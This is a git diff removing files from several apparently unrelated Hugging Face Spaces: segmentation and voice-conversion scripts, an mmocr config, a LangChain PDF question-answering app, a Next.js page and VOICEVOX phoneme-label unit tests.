- segmodel_dir = 'dataset/segmodel/%s-%s-%s' % ((segvocab,) + segmodel_arch)
- # Load json of class names and part/object structure
- with open(os.path.join(segmodel_dir, 'labels.json')) as f:
- labeldata = json.load(f)
- nr_classes={k: len(labeldata[k])
- for k in ['object', 'scene', 'material']}
- nr_classes['part'] = sum(len(p) for p in labeldata['object_part'].values())
- # Create a segmentation model
- segbuilder = upsegmodel.ModelBuilder()
- # example segmodel_arch = ('resnet101', 'upernet')
- seg_encoder = segbuilder.build_encoder(
- arch=segmodel_arch[0],
- fc_dim=2048,
- weights=os.path.join(segmodel_dir, 'encoder_epoch_%d.pth' % epoch))
- seg_decoder = segbuilder.build_decoder(
- arch=segmodel_arch[1],
- fc_dim=2048, use_softmax=True,
- nr_classes=nr_classes,
- weights=os.path.join(segmodel_dir, 'decoder_epoch_%d.pth' % epoch))
- segmodel = upsegmodel.SegmentationModule(
- seg_encoder, seg_decoder, labeldata)
- segmodel.categories = ['object', 'part', 'material']
- segmodel.eval()
- return segmodel
-
-def load_segmentation_model(modeldir, segmodel_arch, segvocab, epoch=None):
- # Load csv of class names
- segmodel_dir = 'dataset/segmodel/%s-%s-%s' % ((segvocab,) + segmodel_arch)
- with open(os.path.join(segmodel_dir, 'labels.json')) as f:
- labeldata = EasyDict(json.load(f))
- # Automatically pick the last epoch available.
- if epoch is None:
- choices = [os.path.basename(n)[14:-4] for n in
- glob.glob(os.path.join(segmodel_dir, 'encoder_epoch_*.pth'))]
- epoch = max([int(c) for c in choices if c.isdigit()])
- # Create a segmentation model
- segbuilder = segmodel_module.ModelBuilder()
- # example segmodel_arch = ('resnet101', 'upernet')
- seg_encoder = segbuilder.build_encoder(
- arch=segmodel_arch[0],
- fc_dim=2048,
- weights=os.path.join(segmodel_dir, 'encoder_epoch_%d.pth' % epoch))
- seg_decoder = segbuilder.build_decoder(
- arch=segmodel_arch[1],
- fc_dim=2048, inference=True, num_class=len(labeldata.labels),
- weights=os.path.join(segmodel_dir, 'decoder_epoch_%d.pth' % epoch))
- segmodel = segmodel_module.SegmentationModule(seg_encoder, seg_decoder,
- torch.nn.NLLLoss(ignore_index=-1))
- segmodel.categories = [cat.name for cat in labeldata.categories]
- segmodel.labels = [label.name for label in labeldata.labels]
- categories = OrderedDict()
- label_category = numpy.zeros(len(segmodel.labels), dtype=int)
- for i, label in enumerate(labeldata.labels):
- label_category[i] = segmodel.categories.index(label.category)
- segmodel.meta = labeldata
- segmodel.eval()
- return segmodel
-
-def ensure_upp_segmenter_downloaded(directory):
- baseurl = 'http://netdissect.csail.mit.edu/data/segmodel'
- dirname = 'upp-resnet50-upernet'
- files = ['decoder_epoch_40.pth', 'encoder_epoch_40.pth', 'labels.json']
- download_dir = os.path.join(directory, dirname)
- os.makedirs(download_dir, exist_ok=True)
- for fn in files:
- if os.path.isfile(os.path.join(download_dir, fn)):
- continue # Skip files already downloaded
- url = '%s/%s/%s' % (baseurl, dirname, fn)
- print('Downloading %s' % url)
- urlretrieve(url, os.path.join(download_dir, fn))
- assert os.path.isfile(os.path.join(directory, dirname, 'labels.json'))
-
-def test_main():
- '''
- Test the unified segmenter.
- '''
- from PIL import Image
- testim = Image.open('script/testdata/test_church_242.jpg')
- tensor_im = (torch.from_numpy(numpy.asarray(testim)).permute(2, 0, 1)
- .float() / 255 * 2 - 1)[None, :, :, :].cuda()
- segmenter = UnifiedParsingSegmenter()
- seg = segmenter.segment_batch(tensor_im)
- bc = torch.bincount(seg.view(-1))
- labels, cats = segmenter.get_label_and_category_names()
- for label in bc.nonzero()[:,0]:
- if label.item():
- # What is the prediction for this class?
- pred, mask = segmenter.predict_single_class(tensor_im, label.item())
- assert mask.sum().item() == bc[label].item()
- assert len(((seg == label).max(1)[0] - mask).nonzero()) == 0
- inside_pred = pred[mask].mean().item()
- outside_pred = pred[~mask].mean().item()
- print('%s (%s, #%d): %d pixels, pred %.2g inside %.2g outside' %
- (labels[label.item()] + (label.item(), bc[label].item(),
- inside_pred, outside_pred)))
-
-if __name__ == '__main__':
- test_main()
diff --git a/spaces/Dragonnext/scylla-proxy/README.md b/spaces/Dragonnext/scylla-proxy/README.md
deleted file mode 100644
index ac6dcd2d2cefb29aa31c7c7dbcde8083c19272ab..0000000000000000000000000000000000000000
--- a/spaces/Dragonnext/scylla-proxy/README.md
+++ /dev/null
@@ -1,10 +0,0 @@
----
-title: Scylla OAI Proxy
-emoji: 🐙
-colorFrom: purple
-colorTo: gray
-sdk: docker
-pinned: false
----
-
-Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
diff --git a/spaces/Eddycrack864/Applio-Inference/infer/modules/train/extract/extract_f0_rmvpe.py b/spaces/Eddycrack864/Applio-Inference/infer/modules/train/extract/extract_f0_rmvpe.py
deleted file mode 100644
index c6c90440d9e612b37c6d5a514786a6d0fffb19ba..0000000000000000000000000000000000000000
--- a/spaces/Eddycrack864/Applio-Inference/infer/modules/train/extract/extract_f0_rmvpe.py
+++ /dev/null
@@ -1,141 +0,0 @@
-import os
-import sys
-import traceback
-
-import parselmouth
-
-now_dir = os.getcwd()
-sys.path.append(now_dir)
-import logging
-
-import numpy as np
-import pyworld
-
-from infer.lib.audio import load_audio
-
-logging.getLogger("numba").setLevel(logging.WARNING)
-
-n_part = int(sys.argv[1])
-i_part = int(sys.argv[2])
-i_gpu = sys.argv[3]
-os.environ["CUDA_VISIBLE_DEVICES"] = str(i_gpu)
-exp_dir = sys.argv[4]
-is_half = sys.argv[5]
-f = open("%s/extract_f0_feature.log" % exp_dir, "a+")
-
-
-def printt(strr):
- print(strr)
- f.write("%s\n" % strr)
- f.flush()
-
-
-class FeatureInput(object):
- def __init__(self, samplerate=16000, hop_size=160):
- self.fs = samplerate
- self.hop = hop_size
-
- self.f0_bin = 256
- self.f0_max = 1100.0
- self.f0_min = 50.0
- self.f0_mel_min = 1127 * np.log(1 + self.f0_min / 700)
- self.f0_mel_max = 1127 * np.log(1 + self.f0_max / 700)
-
- def compute_f0(self, path, f0_method):
- x = load_audio(path, self.fs)
- # p_len = x.shape[0] // self.hop
- if f0_method == "rmvpe":
- if not hasattr(self, "model_rmvpe"):
- from infer.lib.rmvpe import RMVPE
-
- print("Loading rmvpe model")
- self.model_rmvpe = RMVPE(
- "assets/rmvpe/rmvpe.pt", is_half=is_half, device="cuda"
- )
- f0 = self.model_rmvpe.infer_from_audio(x, thred=0.03)
- return f0
-
- def coarse_f0(self, f0):
- f0_mel = 1127 * np.log(1 + f0 / 700)
- f0_mel[f0_mel > 0] = (f0_mel[f0_mel > 0] - self.f0_mel_min) * (
- self.f0_bin - 2
- ) / (self.f0_mel_max - self.f0_mel_min) + 1
-
- # use 0 or 1
- f0_mel[f0_mel <= 1] = 1
- f0_mel[f0_mel > self.f0_bin - 1] = self.f0_bin - 1
- f0_coarse = np.rint(f0_mel).astype(int)
- assert f0_coarse.max() <= 255 and f0_coarse.min() >= 1, (
- f0_coarse.max(),
- f0_coarse.min(),
- )
- return f0_coarse
-
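- # Worked example for coarse_f0 (added; values are approximate): for f0 = 220 Hz,
- # f0_mel = 1127 * ln(1 + 220 / 700) ≈ 308.0; with f0_mel_min ≈ 77.8 and
- # f0_mel_max ≈ 1064.4, the scaled value is
- # (308.0 - 77.8) * 254 / (1064.4 - 77.8) + 1 ≈ 60.3, so the coarse bin is 60.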
- def go(self, paths, f0_method):
- if len(paths) == 0:
- printt("no-f0-todo")
- else:
- printt("todo-f0-%s" % len(paths))
- n = max(len(paths) // 5, 1) # print at most 5 progress lines per process
- for idx, (inp_path, opt_path1, opt_path2) in enumerate(paths):
- try:
- if idx % n == 0:
- printt("f0ing,now-%s,all-%s,-%s" % (idx, len(paths), inp_path))
- if (
- os.path.exists(opt_path1 + ".npy")
- and os.path.exists(opt_path2 + ".npy")
- ):
- continue
- featur_pit = self.compute_f0(inp_path, f0_method)
- np.save(
- opt_path2,
- featur_pit,
- allow_pickle=False,
- ) # nsf
- coarse_pit = self.coarse_f0(featur_pit)
- np.save(
- opt_path1,
- coarse_pit,
- allow_pickle=False,
- ) # ori
- except:
- printt("f0fail-%s-%s-%s" % (idx, inp_path, traceback.format_exc()))
-
-
-if __name__ == "__main__":
- # exp_dir=r"E:\codes\py39\dataset\mi-test"
- # n_p=16
- # f = open("%s/log_extract_f0.log"%exp_dir, "w")
- printt(sys.argv)
- featureInput = FeatureInput()
- paths = []
- inp_root = "%s/1_16k_wavs" % (exp_dir)
- opt_root1 = "%s/2a_f0" % (exp_dir)
- opt_root2 = "%s/2b-f0nsf" % (exp_dir)
-
- os.makedirs(opt_root1, exist_ok=True)
- os.makedirs(opt_root2, exist_ok=True)
- for name in sorted(list(os.listdir(inp_root))):
- inp_path = "%s/%s" % (inp_root, name)
- if "spec" in inp_path:
- continue
- opt_path1 = "%s/%s" % (opt_root1, name)
- opt_path2 = "%s/%s" % (opt_root2, name)
- paths.append([inp_path, opt_path1, opt_path2])
- try:
- featureInput.go(paths[i_part::n_part], "rmvpe")
- except:
- printt("f0_all_fail-%s" % (traceback.format_exc()))
- # ps = []
- # for i in range(n_p):
- # p = Process(
- # target=featureInput.go,
- # args=(
- # paths[i::n_p],
- # f0method,
- # ),
- # )
- # ps.append(p)
- # p.start()
- # for i in range(n_p):
- # ps[i].join()
diff --git a/spaces/Endre/SemanticSearch-HU/src/exploration/mqa_test.py b/spaces/Endre/SemanticSearch-HU/src/exploration/mqa_test.py
deleted file mode 100644
index 005fb0a51e420f8e79ee44803dbf2234a0290890..0000000000000000000000000000000000000000
--- a/spaces/Endre/SemanticSearch-HU/src/exploration/mqa_test.py
+++ /dev/null
@@ -1,9 +0,0 @@
-from datasets import load_dataset
-
-faq_hu = load_dataset("clips/mqa", scope="faq", language="hu")
-cqa_hu = load_dataset("clips/mqa", scope="cqa", language="hu")
-
-print(faq_hu)
-print(cqa_hu)
-print(faq_hu['train'][:5])
-print(cqa_hu['train'][:5])
\ No newline at end of file
diff --git a/spaces/EronSamez/RVC_HFmeu/colab_for_mdx.py b/spaces/EronSamez/RVC_HFmeu/colab_for_mdx.py
deleted file mode 100644
index 274846d0b5395865a05fce0da86b96d26ac06999..0000000000000000000000000000000000000000
--- a/spaces/EronSamez/RVC_HFmeu/colab_for_mdx.py
+++ /dev/null
@@ -1,71 +0,0 @@
-import json
-import os
-import gc
-import psutil
-import requests
-import subprocess
-import time
-import logging
-import sys
-import shutil
-now_dir = os.getcwd()
-sys.path.append(now_dir)
-first_cell_executed = False
-file_folder = "Colab-for-MDX_B"
-def first_cell_ran():
- global first_cell_executed
- if first_cell_executed:
- #print("The 'first_cell_ran' function has already been executed.")
- return
-
-
-
- first_cell_executed = True
- os.makedirs("tmp_models", exist_ok=True)
-
-
-
- class hide_opt: # hide outputs
- def __enter__(self):
- self._original_stdout = sys.stdout
- sys.stdout = open(os.devnull, "w")
-
- def __exit__(self, exc_type, exc_val, exc_tb):
- sys.stdout.close()
- sys.stdout = self._original_stdout
-
- def get_size(bytes, suffix="B"): # read ram
- global svmem
- factor = 1024
- for unit in ["", "K", "M", "G", "T", "P"]:
- if bytes < factor:
- return f"{bytes:.2f}{unit}{suffix}"
- bytes /= factor
- svmem = psutil.virtual_memory()
-
-
- def use_uvr_without_saving():
- print("Notice: files won't be saved to personal drive.")
- print(f"Downloading {file_folder}...", end=" ")
- with hide_opt():
- #os.chdir(mounting_path)
- items_to_move = ["demucs", "diffq","julius","model","separated","tracks","mdx.py","MDX-Net_Colab.ipynb"]
- subprocess.run(["git", "clone", "https://github.com/NaJeongMo/Colab-for-MDX_B.git"])
- for item_name in items_to_move:
- item_path = os.path.join(file_folder, item_name)
- if os.path.exists(item_path):
- if os.path.isfile(item_path):
- shutil.move(item_path, now_dir)
- elif os.path.isdir(item_path):
- shutil.move(item_path, now_dir)
- try:
- shutil.rmtree(file_folder)
- except PermissionError:
- print(f"No se pudo eliminar la carpeta {file_folder}. Puede estar relacionada con Git.")
-
-
- use_uvr_without_saving()
- print("done!")
- if not os.path.exists("tracks"):
- os.mkdir("tracks")
-first_cell_ran()
\ No newline at end of file
diff --git a/spaces/EuroPython2022/mmocr-demo/configs/_base_/schedules/schedule_adadelta_18e.py b/spaces/EuroPython2022/mmocr-demo/configs/_base_/schedules/schedule_adadelta_18e.py
deleted file mode 100644
index 33f7960c51bf7d0f2b5bc03e8707a85a01e000fd..0000000000000000000000000000000000000000
--- a/spaces/EuroPython2022/mmocr-demo/configs/_base_/schedules/schedule_adadelta_18e.py
+++ /dev/null
@@ -1,8 +0,0 @@
-# optimizer
-optimizer = dict(type='Adadelta', lr=0.5)
-optimizer_config = dict(grad_clip=dict(max_norm=0.5))
-# learning policy
-lr_config = dict(policy='step', step=[8, 14, 16])
-# running settings
-runner = dict(type='EpochBasedRunner', max_epochs=18)
-checkpoint_config = dict(interval=1)
diff --git a/spaces/FacundoSander/PdfQA/main.py b/spaces/FacundoSander/PdfQA/main.py
deleted file mode 100644
index e2a357414f8fd841a9957f891cae03f30ccfa621..0000000000000000000000000000000000000000
--- a/spaces/FacundoSander/PdfQA/main.py
+++ /dev/null
@@ -1,53 +0,0 @@
-from langchain.chains import RetrievalQA
-from langchain.llms import OpenAI
-from langchain.document_loaders import PyPDFLoader
-from langchain.text_splitter import CharacterTextSplitter
-from langchain.embeddings import OpenAIEmbeddings
-from langchain.vectorstores import Chroma
-from fastapi import FastAPI
-from fastapi.staticfiles import StaticFiles
-
-app = FastAPI()
-
-app.mount("/static", StaticFiles(directory="static"), name="static")
-
-def create_qa_object(file, chain_type, k):
- # load document
- loader = PyPDFLoader(file)
- documents = loader.load()
-
- # split the documents into chunks
- text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
- texts = text_splitter.split_documents(documents)
-
- # select which embeddings we want to use
- embeddings = OpenAIEmbeddings()
-
- # create the vectorestore to use as the index
- db = Chroma.from_documents(texts, embeddings)
-
- # expose this index in a retriever interface
- retriever = db.as_retriever(search_type="similarity", search_kwargs={"k": k})
-
- # create a chain to answer questions
- qa = RetrievalQA.from_chain_type(
- llm=OpenAI(), chain_type=chain_type, retriever=retriever, return_source_documents=True)
-
- return qa
-
-def get_answer(qa, query):
- result = qa({"query": query})
- return result["result"]
-
-def get_source_documents(qa, query):
- result = qa({"query": query})
- source_documents = result["source_documents"]
- source_info = []
- for doc in source_documents:
- source_info.append(f"{doc.page_content[:700]}...")
- source_text = " | ".join(source_info)
- return source_text
-
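-# Illustrative usage (added; the PDF path and question are placeholders, and an
-# OpenAI API key is assumed to be configured in the environment):
-# qa = create_qa_object("example.pdf", chain_type="stuff", k=3)
-# print(get_answer(qa, "What is this document about?"))
-# print(get_source_documents(qa, "What is this document about?"))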
-if __name__ == "__main__":
- import uvicorn
- uvicorn.run("api:app", host="0.0.0.0", port=8000, reload=True)
diff --git a/spaces/GXSA/bingo/src/app/page.tsx b/spaces/GXSA/bingo/src/app/page.tsx
deleted file mode 100644
index 0dff3431b098ce4fe282cc83fc87a93a28a43090..0000000000000000000000000000000000000000
--- a/spaces/GXSA/bingo/src/app/page.tsx
+++ /dev/null
@@ -1,15 +0,0 @@
-import dynamic from 'next/dynamic'
-
-const DynamicComponentWithNoSSR = dynamic(
- () => import('../components/chat'),
- { ssr: false }
-)
-
-export default function IndexPage() {
- return (
- <>
- <DynamicComponentWithNoSSR />
- </>
- )
-}
diff --git a/spaces/GaenKoki/voicevox/test/test_full_context_label.py b/spaces/GaenKoki/voicevox/test/test_full_context_label.py
deleted file mode 100644
index 7cdde34f4644ccf7b3048d707f99b0171e25114e..0000000000000000000000000000000000000000
--- a/spaces/GaenKoki/voicevox/test/test_full_context_label.py
+++ /dev/null
@@ -1,404 +0,0 @@
-from copy import deepcopy
-from itertools import chain
-from unittest import TestCase
-
-from voicevox_engine.full_context_label import (
- AccentPhrase,
- BreathGroup,
- Mora,
- Phoneme,
- Utterance,
-)
-
-
-class TestBasePhonemes(TestCase):
- def setUp(self):
- super().setUp()
- # Output of pyopenjtalk.extract_fullcontext("こんにちは、ヒホです。")
- # The test cases are generated inline so that the tests depend on other
- # libraries as little as possible and the test content stays transparent.
- self.test_case_hello_hiho = [
- # sil (silence)
- "xx^xx-sil+k=o/A:xx+xx+xx/B:xx-xx_xx/C:xx_xx+xx/D:09+xx_xx/E:xx_xx!xx_xx-xx"
- + "/F:xx_xx#xx_xx@xx_xx|xx_xx/G:5_5%0_xx_xx/H:xx_xx/I:xx-xx"
- + "@xx+xx&xx-xx|xx+xx/J:1_5/K:2+2-9",
- # k
- "xx^sil-k+o=N/A:-4+1+5/B:xx-xx_xx/C:09_xx+xx/D:09+xx_xx/E:xx_xx!xx_xx-xx"
- + "/F:5_5#0_xx@1_1|1_5/G:4_1%0_xx_0/H:xx_xx/I:1-5"
- + "@1+2&1-2|1+9/J:1_4/K:2+2-9",
- # o
- "sil^k-o+N=n/A:-4+1+5/B:xx-xx_xx/C:09_xx+xx/D:09+xx_xx/E:xx_xx!xx_xx-xx"
- + "/F:5_5#0_xx@1_1|1_5/G:4_1%0_xx_0/H:xx_xx/I:1-5"
- + "@1+2&1-2|1+9/J:1_4/K:2+2-9",
- # N (the moraic nasal ん)
- "k^o-N+n=i/A:-3+2+4/B:xx-xx_xx/C:09_xx+xx/D:09+xx_xx/E:xx_xx!xx_xx-xx"
- + "/F:5_5#0_xx@1_1|1_5/G:4_1%0_xx_0/H:xx_xx/I:1-5"
- + "@1+2&1-2|1+9/J:1_4/K:2+2-9",
- # n
- "o^N-n+i=ch/A:-2+3+3/B:xx-xx_xx/C:09_xx+xx/D:09+xx_xx/E:xx_xx!xx_xx-xx"
- + "/F:5_5#0_xx@1_1|1_5/G:4_1%0_xx_0/H:xx_xx/I:1-5"
- + "@1+2&1-2|1+9/J:1_4/K:2+2-9",
- # i
- "N^n-i+ch=i/A:-2+3+3/B:xx-xx_xx/C:09_xx+xx/D:09+xx_xx/E:xx_xx!xx_xx-xx"
- + "/F:5_5#0_xx@1_1|1_5/G:4_1%0_xx_0/H:xx_xx/I:1-5"
- + "@1+2&1-2|1+9/J:1_4/K:2+2-9",
- # ch
- "n^i-ch+i=w/A:-1+4+2/B:xx-xx_xx/C:09_xx+xx/D:09+xx_xx/E:xx_xx!xx_xx-xx"
- + "/F:5_5#0_xx@1_1|1_5/G:4_1%0_xx_0/H:xx_xx/I:1-5"
- + "@1+2&1-2|1+9/J:1_4/K:2+2-9",
- # i
- "i^ch-i+w=a/A:-1+4+2/B:xx-xx_xx/C:09_xx+xx/D:09+xx_xx/E:xx_xx!xx_xx-xx"
- + "/F:5_5#0_xx@1_1|1_5/G:4_1%0_xx_0/H:xx_xx/I:1-5"
- + "@1+2&1-2|1+9/J:1_4/K:2+2-9",
- # w
- "ch^i-w+a=pau/A:0+5+1/B:xx-xx_xx/C:09_xx+xx/D:09+xx_xx/E:xx_xx!xx_xx-xx"
- + "/F:5_5#0_xx@1_1|1_5/G:4_1%0_xx_0/H:xx_xx/I:1-5"
- + "@1+2&1-2|1+9/J:1_4/K:2+2-9",
- # a
- "i^w-a+pau=h/A:0+5+1/B:xx-xx_xx/C:09_xx+xx/D:09+xx_xx/E:xx_xx!xx_xx-xx"
- + "/F:5_5#0_xx@1_1|1_5/G:4_1%0_xx_0/H:xx_xx/I:1-5"
- + "@1+2&1-2|1+9/J:1_4/K:2+2-9",
- # pau (pause at the comma)
- "w^a-pau+h=i/A:xx+xx+xx/B:09-xx_xx/C:xx_xx+xx/D:09+xx_xx/E:5_5!0_xx-xx"
- + "/F:xx_xx#xx_xx@xx_xx|xx_xx/G:4_1%0_xx_xx/H:1_5/I:xx-xx"
- + "@xx+xx&xx-xx|xx+xx/J:1_4/K:2+2-9",
- # h
- "a^pau-h+i=h/A:0+1+4/B:09-xx_xx/C:09_xx+xx/D:22+xx_xx/E:5_5!0_xx-0"
- + "/F:4_1#0_xx@1_1|1_4/G:xx_xx%xx_xx_xx/H:1_5/I:1-4"
- + "@2+1&2-1|6+4/J:xx_xx/K:2+2-9",
- # i
- "pau^h-i+h=o/A:0+1+4/B:09-xx_xx/C:09_xx+xx/D:22+xx_xx/E:5_5!0_xx-0"
- + "/F:4_1#0_xx@1_1|1_4/G:xx_xx%xx_xx_xx/H:1_5/I:1-4"
- + "@2+1&2-1|6+4/J:xx_xx/K:2+2-9",
- # h
- "h^i-h+o=d/A:1+2+3/B:09-xx_xx/C:22_xx+xx/D:10+7_2/E:5_5!0_xx-0"
- + "/F:4_1#0_xx@1_1|1_4/G:xx_xx%xx_xx_xx/H:1_5/I:1-4"
- + "@2+1&2-1|6+4/J:xx_xx/K:2+2-9",
- # o
- "i^h-o+d=e/A:1+2+3/B:09-xx_xx/C:22_xx+xx/D:10+7_2/E:5_5!0_xx-0"
- + "/F:4_1#0_xx@1_1|1_4/G:xx_xx%xx_xx_xx/H:1_5/I:1-4"
- + "@2+1&2-1|6+4/J:xx_xx/K:2+2-9",
- # d
- "h^o-d+e=s/A:2+3+2/B:22-xx_xx/C:10_7+2/D:xx+xx_xx/E:5_5!0_xx-0"
- + "/F:4_1#0_xx@1_1|1_4/G:xx_xx%xx_xx_xx/H:1_5/I:1-4"
- + "@2+1&2-1|6+4/J:xx_xx/K:2+2-9",
- # e
- "o^d-e+s=U/A:2+3+2/B:22-xx_xx/C:10_7+2/D:xx+xx_xx/E:5_5!0_xx-0"
- + "/F:4_1#0_xx@1_1|1_4/G:xx_xx%xx_xx_xx/H:1_5/I:1-4"
- + "@2+1&2-1|6+4/J:xx_xx/K:2+2-9",
- # s
- "d^e-s+U=sil/A:3+4+1/B:22-xx_xx/C:10_7+2/D:xx+xx_xx/E:5_5!0_xx-0"
- + "/F:4_1#0_xx@1_1|1_4/G:xx_xx%xx_xx_xx/H:1_5/I:1-4"
- + "@2+1&2-1|6+4/J:xx_xx/K:2+2-9",
- # U (devoiced vowel)
- "e^s-U+sil=xx/A:3+4+1/B:22-xx_xx/C:10_7+2/D:xx+xx_xx/E:5_5!0_xx-0"
- + "/F:4_1#0_xx@1_1|1_4/G:xx_xx%xx_xx_xx/H:1_5/I:1-4"
- + "@2+1&2-1|6+4/J:xx_xx/K:2+2-9",
- # sil (silence)
- "s^U-sil+xx=xx/A:xx+xx+xx/B:10-7_2/C:xx_xx+xx/D:xx+xx_xx/E:4_1!0_xx-xx"
- + "/F:xx_xx#xx_xx@xx_xx|xx_xx/G:xx_xx%xx_xx_xx/H:1_4/I:xx-xx"
- + "@xx+xx&xx-xx|xx+xx/J:xx_xx/K:2+2-9",
- ]
- self.phonemes_hello_hiho = [
- Phoneme.from_label(label) for label in self.test_case_hello_hiho
- ]
-
-
-class TestPhoneme(TestBasePhonemes):
- def test_phoneme(self):
- self.assertEqual(
- " ".join([phoneme.phoneme for phoneme in self.phonemes_hello_hiho]),
- "sil k o N n i ch i w a pau h i h o d e s U sil",
- )
-
- def test_is_pause(self):
- self.assertEqual(
- [phoneme.is_pause() for phoneme in self.phonemes_hello_hiho],
- [
- True, # sil
- False, # k
- False, # o
- False, # N
- False, # n
- False, # i
- False, # ch
- False, # i
- False, # w
- False, # a
- True, # pau
- False, # h
- False, # i
- False, # h
- False, # o
- False, # d
- False, # e
- False, # s
- False, # u
- True, # sil
- ],
- )
-
- def test_label(self) -> None:
- self.assertEqual(
- [phoneme.label for phoneme in self.phonemes_hello_hiho],
- self.test_case_hello_hiho,
- )
-
-
-class TestMora(TestBasePhonemes):
- def setUp(self) -> None:
- super().setUp()
- # contexts["a2"] == "1" ko
- self.mora_hello_1 = Mora(
- consonant=self.phonemes_hello_hiho[1], vowel=self.phonemes_hello_hiho[2]
- )
- # contexts["a2"] == "2" N
- self.mora_hello_2 = Mora(consonant=None, vowel=self.phonemes_hello_hiho[3])
- # contexts["a2"] == "3" ni
- self.mora_hello_3 = Mora(
- consonant=self.phonemes_hello_hiho[4], vowel=self.phonemes_hello_hiho[5]
- )
- # contexts["a2"] == "4" chi
- self.mora_hello_4 = Mora(
- consonant=self.phonemes_hello_hiho[6], vowel=self.phonemes_hello_hiho[7]
- )
- # contexts["a2"] == "5" wa
- self.mora_hello_5 = Mora(
- consonant=self.phonemes_hello_hiho[8], vowel=self.phonemes_hello_hiho[9]
- )
- # contexts["a2"] == "1" hi
- self.mora_hiho_1 = Mora(
- consonant=self.phonemes_hello_hiho[11], vowel=self.phonemes_hello_hiho[12]
- )
- # contexts["a2"] == "2" ho
- self.mora_hiho_2 = Mora(
- consonant=self.phonemes_hello_hiho[13], vowel=self.phonemes_hello_hiho[14]
- )
- # contexts["a2"] == "3" de
- self.mora_hiho_3 = Mora(
- consonant=self.phonemes_hello_hiho[15], vowel=self.phonemes_hello_hiho[16]
- )
- # contexts["a2"] == "1" sU
- self.mora_hiho_4 = Mora(
- consonant=self.phonemes_hello_hiho[17], vowel=self.phonemes_hello_hiho[18]
- )
-
- def assert_phonemes(self, mora: Mora, mora_str: str) -> None:
- self.assertEqual(
- "".join([phoneme.phoneme for phoneme in mora.phonemes]), mora_str
- )
-
- def assert_labels(self, mora: Mora, label_start: int, label_end: int) -> None:
- self.assertEqual(mora.labels, self.test_case_hello_hiho[label_start:label_end])
-
- def test_phonemes(self) -> None:
- self.assert_phonemes(self.mora_hello_1, "ko")
- self.assert_phonemes(self.mora_hello_2, "N")
- self.assert_phonemes(self.mora_hello_3, "ni")
- self.assert_phonemes(self.mora_hello_4, "chi")
- self.assert_phonemes(self.mora_hello_5, "wa")
- self.assert_phonemes(self.mora_hiho_1, "hi")
- self.assert_phonemes(self.mora_hiho_2, "ho")
- self.assert_phonemes(self.mora_hiho_3, "de")
- self.assert_phonemes(self.mora_hiho_4, "sU")
-
- def test_labels(self) -> None:
- self.assert_labels(self.mora_hello_1, 1, 3)
- self.assert_labels(self.mora_hello_2, 3, 4)
- self.assert_labels(self.mora_hello_3, 4, 6)
- self.assert_labels(self.mora_hello_4, 6, 8)
- self.assert_labels(self.mora_hello_5, 8, 10)
- self.assert_labels(self.mora_hiho_1, 11, 13)
- self.assert_labels(self.mora_hiho_2, 13, 15)
- self.assert_labels(self.mora_hiho_3, 15, 17)
- self.assert_labels(self.mora_hiho_4, 17, 19)
-
- def test_set_context(self):
- # deepcopy so that rewriting values does not affect other tests
- mora_hello_1 = deepcopy(self.mora_hello_1)
- # rewrite "p3", the context that corresponds to the phoneme
- mora_hello_1.set_context("p3", "a")
- self.assert_phonemes(mora_hello_1, "aa")
-
-
-class TestAccentPhrase(TestBasePhonemes):
- def setUp(self) -> None:
- super().setUp()
- # TODO: look for a natural (non-contrived) example that raises ValueError
- # if none exists, it is fine to leave this as is
- self.accent_phrase_hello = AccentPhrase.from_phonemes(
- self.phonemes_hello_hiho[1:10]
- )
- self.accent_phrase_hiho = AccentPhrase.from_phonemes(
- self.phonemes_hello_hiho[11:19]
- )
-
- def test_accent(self):
- self.assertEqual(self.accent_phrase_hello.accent, 5)
- self.assertEqual(self.accent_phrase_hiho.accent, 1)
-
- def test_set_context(self):
- accent_phrase_hello = deepcopy(self.accent_phrase_hello)
- # rewrite "p3", the context that corresponds to the phoneme
- accent_phrase_hello.set_context("p3", "a")
- self.assertEqual(
- "".join([phoneme.phoneme for phoneme in accent_phrase_hello.phonemes]),
- "aaaaaaaaa",
- )
-
- def test_phonemes(self):
- self.assertEqual(
- " ".join(
- [phoneme.phoneme for phoneme in self.accent_phrase_hello.phonemes]
- ),
- "k o N n i ch i w a",
- )
- self.assertEqual(
- " ".join([phoneme.phoneme for phoneme in self.accent_phrase_hiho.phonemes]),
- "h i h o d e s U",
- )
-
- def test_labels(self):
- self.assertEqual(
- self.accent_phrase_hello.labels, self.test_case_hello_hiho[1:10]
- )
- self.assertEqual(
- self.accent_phrase_hiho.labels, self.test_case_hello_hiho[11:19]
- )
-
- def test_merge(self):
- # "こんにちはヒホです"
- # equivalent to the same utterance with the comma removed
- merged_accent_phrase = self.accent_phrase_hello.merge(self.accent_phrase_hiho)
- self.assertEqual(merged_accent_phrase.accent, 5)
- self.assertEqual(
- " ".join([phoneme.phoneme for phoneme in merged_accent_phrase.phonemes]),
- "k o N n i ch i w a h i h o d e s U",
- )
- self.assertEqual(
- merged_accent_phrase.labels,
- self.test_case_hello_hiho[1:10] + self.test_case_hello_hiho[11:19],
- )
-
-
-class TestBreathGroup(TestBasePhonemes):
- def setUp(self) -> None:
- super().setUp()
- self.breath_group_hello = BreathGroup.from_phonemes(
- self.phonemes_hello_hiho[1:10]
- )
- self.breath_group_hiho = BreathGroup.from_phonemes(
- self.phonemes_hello_hiho[11:19]
- )
-
- def test_set_context(self):
- # deepcopy so that rewriting values does not affect other tests
- breath_group_hello = deepcopy(self.breath_group_hello)
- # rewrite "p3", the context that corresponds to the phoneme
- breath_group_hello.set_context("p3", "a")
- self.assertEqual(
- "".join([phoneme.phoneme for phoneme in breath_group_hello.phonemes]),
- "aaaaaaaaa",
- )
-
- def test_phonemes(self):
- self.assertEqual(
- " ".join([phoneme.phoneme for phoneme in self.breath_group_hello.phonemes]),
- "k o N n i ch i w a",
- )
- self.assertEqual(
- " ".join([phoneme.phoneme for phoneme in self.breath_group_hiho.phonemes]),
- "h i h o d e s U",
- )
-
- def test_labels(self):
- self.assertEqual(
- self.breath_group_hello.labels, self.test_case_hello_hiho[1:10]
- )
- self.assertEqual(
- self.breath_group_hiho.labels, self.test_case_hello_hiho[11:19]
- )
-
-
-class TestUtterance(TestBasePhonemes):
- def setUp(self) -> None:
- super().setUp()
- self.utterance_hello_hiho = Utterance.from_phonemes(self.phonemes_hello_hiho)
-
- def test_phonemes(self):
- self.assertEqual(
- " ".join(
- [phoneme.phoneme for phoneme in self.utterance_hello_hiho.phonemes]
- ),
- "sil k o N n i ch i w a pau h i h o d e s U sil",
- )
